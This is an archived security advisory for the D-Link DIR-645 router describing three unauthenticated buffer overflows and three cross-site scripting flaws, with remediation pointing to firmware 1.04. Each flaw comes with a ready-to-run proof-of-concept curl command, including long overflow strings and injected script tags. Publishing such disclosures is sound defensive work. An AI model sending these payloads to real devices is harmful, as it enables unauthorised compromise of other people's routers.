what you don't know can hurt you

D-Link DIR-645 Buffer Overflow / Cross Site Scripting

D-Link DIR-645 Buffer Overflow / Cross Site Scripting
Posted Aug 2, 2013
Authored by Roberto Paleari

D-Link DIR-645 devices suffer from buffer overflow and cross site scripting vulnerabilities.

tags | exploit, overflow, vulnerability, xss
MD5 | 38e7a18c34392ffd2cf78fc889e126df

D-Link DIR-645 Buffer Overflow / Cross Site Scripting

Change Mirror Download
Multiple vulnerabilities on D-Link DIR-645 devices
==================================================

[ADVISORY INFORMATION]
Title: Multiple vulnerabilities on D-Link DIR-645 devices
Discovery date: 06/03/2013
Release date: 02/08/2013
Advisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt
Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)

[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:
* D-Link DIR-645, 1.03B08
Other products and firmware versions could also be vulnerable, but they were
not checked.

[VULNERABILITY DETAILS]
This router model is affected by multiple security vulnerabilities. All of them
are exploitable by remote, unauthenticated attackers. Details are outlined in
the following, including some proof-of-concepts.

1. Buffer overflow on "post_login.xml"

Invoking the "post_login.xml" server-side script, attackers can specify a
"hash" password value that is used to authenticate the user. This hash value
is eventually processed by the "/usr/sbin/widget" local binary. However, the
latter copies the user-controlled hash into a statically-allocated buffer,
allowing attackers to overwrite adjacent memory locations.

As a proof-of-concept, the following URL allows attackers to control the
return value saved on the stack (the vulnerability is triggered when
executing "/usr/sbin/widget"):

curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB

The value of the "hash" HTTP GET parameter consists in 292 occurrences of
the 'A' character, followed by four occurrences of character 'B'. In our lab
setup, characters 'B' overwrite the saved program counter (%ra).


2. Buffer overflow on "hedwig.cgi"

Another buffer overflow affects the "hedwig.cgi" CGI script. Unauthenticated
remote attackers can invoke this CGI with an overly-long cookie value that
can overflow a program buffer and overwrite the saved program address.

Proof-of-concept:
curl -b uid=$(perl -e 'print "A"x1400;') -d 'test' http://<target ip>/hedwig.cgi


3. Buffer overflow on "authentication.cgi"

The third buffer overflow vulnerability affects the "authentication.cgi" CGI
script. This time the issue affects the HTTP POST paramter named
"password". Again, this vulnerability can be abused to achieve remote code
execution. As for all the previous issues, no authentication is required.

Proof-of-concept:
curl -b uid=test -d $(perl -e 'print "uid=test&password=asd" . "A"x2024;') http://<target ip>/authentication.cgi


4. Cross-site scripting on "bind.php"

Proof-of-concept:
curl "http://<target ip>/parentalcontrols/bind.php?deviceid=test'\"/><script>alert(1)</script><"


5. Cross-site scripting on "info.php"

Proof-of-concept:
curl "http://<target ip>/info.php?RESULT=testme\", msgArray); alert(1); //"


6. Cross-site scripting on "bsc_sms_send.php"

Proof-of-concept:
curl "http://<target ip>/bsc_sms_send.php?receiver=testme\"/><script>alert(1);</script><div"


[REMEDIATION]
D-Link has released an updated firmware version (1.04) that addresses this
issue. The firmware is already available on D-Link web site, at the following
URL:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close